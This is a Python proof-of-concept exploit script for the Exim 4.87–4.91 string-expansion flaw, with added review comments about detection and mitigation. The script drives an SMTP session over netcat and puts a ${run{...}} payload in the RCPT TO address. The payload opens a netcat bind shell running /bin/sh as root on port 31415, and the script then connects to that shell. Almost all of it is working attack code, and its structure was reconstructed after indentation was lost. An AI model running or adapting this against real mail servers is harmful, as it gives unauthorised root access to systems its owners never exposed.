#
# Spawns a netcat shell on port 31415 as root, then connects to it
# Vulnerability is within Exim 4.87-4.91
#
# NOTE(review): proof-of-concept exploit script against a *local* Exim SMTP
# listener (it only ever talks to "localhost"), kept here for detection and
# mitigation context. Mitigation: run an Exim release outside the affected
# 4.87-4.91 range. Detection: the RCPT TO address below contains an Exim
# "${run{...}}" string-expansion item -- that token in a recipient address
# is the indicator to alert on in MTA logs / SMTP monitoring.
# NOTE(review): the listing was pasted with all indentation lost; the block
# structure below is reconstructed from the control-flow keywords and the
# comment on the "220" check -- TODO confirm against the original gist.
import subprocess
import socket          # imported but not used below
import os
import time
from subprocess import Popen, PIPE   # Popen is imported but not used below

# Recipient address whose local part is an Exim ${run{...}} expansion item;
# the server-side interpretation of the escape sequences is not shown here.
payload = b'${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31415\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'
# os.uname()[1] is the local nodename; used as the HELO argument.
myhost = os.uname()[1]
# Drive the SMTP conversation through a netcat child process; both pipes are
# used so each command can be written and each server reply read back.
proc = subprocess.Popen(["nc", "localhost", "25"], stdin=PIPE, stdout=PIPE)
# repr() of the raw bytes line, so the substring check below runs on a str.
stdout = (repr(proc.stdout.readline()))
print(stdout)
if ("220" in stdout): #Wait for 220 so we can start sending commands
    # Standard envelope: HELO, empty MAIL FROM, then the crafted RCPT TO.
    proc.stdin.write((b'HELO ') + myhost.encode() + b'\n')
    proc.stdin.flush()
    print(repr(proc.stdout.readline()))
    proc.stdin.write(b'MAIL FROM:<>\n')
    proc.stdin.flush()
    print(repr(proc.stdout.readline()))
    proc.stdin.write(b'RCPT TO:<'+ payload + b'>\n')
    proc.stdin.flush()
    print(repr(proc.stdout.readline()))
    proc.stdin.write(b'DATA\n')
    proc.stdin.flush()
    print(repr(proc.stdout.readline()))
    # Write one "Received:" header line per iteration into the message.
    for i in range(1,32):
        proc.stdin.write(b'Received:' + b' ' + bytes(i) + b'\n')
        proc.stdin.flush()
        #print(i)
    # Lone "." on its own line terminates the DATA section.
    proc.stdin.write(b'\n.\n')
    proc.stdin.flush()
    print(repr(proc.stdout.readline()))
    proc.stdin.write(b'QUIT\n')
    proc.stdin.flush()
    print(repr(proc.stdout.readline()))
    # Brief pause before connecting to the listener on 31415 via a shell
    # command (os.system) -- the sleep is a fixed delay, not a readiness check.
    time.sleep(1)
    print("[+] Dropping into shell...")
    os.system("nc localhost 31415")